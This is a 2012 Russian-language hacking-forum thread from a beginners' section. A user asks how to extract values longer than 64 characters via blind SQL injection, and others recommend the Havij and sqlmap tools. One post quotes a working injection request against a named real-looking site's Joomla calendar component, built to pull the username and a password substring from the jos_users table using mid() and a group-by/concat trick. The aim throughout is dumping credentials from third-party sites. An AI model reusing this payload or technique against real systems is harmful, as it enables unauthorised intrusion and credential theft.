Blind SQL Injection как извлечь данные длиннее 64 символов?

Тема в разделе "Для новичков", создана пользователем grad85, 28 июн 2012.

  1. grad85
    grad85 Новичок
    Симпатии:
    0
    Собственно вопрос в название темы.
     
    28 июн 2012
  2. ToBapuw_XaKep
    ToBapuw_XaKep Новичок
    Симпатии:
    8
    руками никак - софт для раскручивания тебе поможет всегда
    (yoda style)
     
    28 июн 2012
  3. Glam_Man
    Glam_Man Новичок
    Симпатии:
    7
    grad85,
    Havij использовал, не?
     
    28 июн 2012
  4. grad85
    grad85 Новичок
    Симпатии:
    0
    havij и пользуюсь.
    там есть опции get data - filter. может быть можно фильтр написать чтоб извлек по частям эти данные.

    Знает кто может как написать?
     
    28 июн 2012
  5. grad85
    grad85 Новичок
    Симпатии:
    0
    На одном фоума написано:

    Можно вырезать подстроку, если поле > 64 символов, функциями substring(), mid().

    Пример:

    PHP:
    Post _ttp://meirbruk.net/en/component/blog_calendar/?year=2011&month=09 Http/1.0
    modid=(@:=1)or@+group+by+concat((select+concat(use  rname,0x3a,mid(password,1,33))+from+jos_users+limi  t+0,1),0x00,@:=!@)having@||min(0)--+

    Как это в фильтре havij прописать?
     
    29 июн 2012
  6. ToBapuw_XaKep
    ToBapuw_XaKep Новичок
    Симпатии:
    8
    забей на havij. Это же не простая sql, чтобы тебе все вылезло. С havij это бывает, да еще и не такое. Пробуй sqlmap, вроде не подводил
     
    29 июн 2012
Загрузка...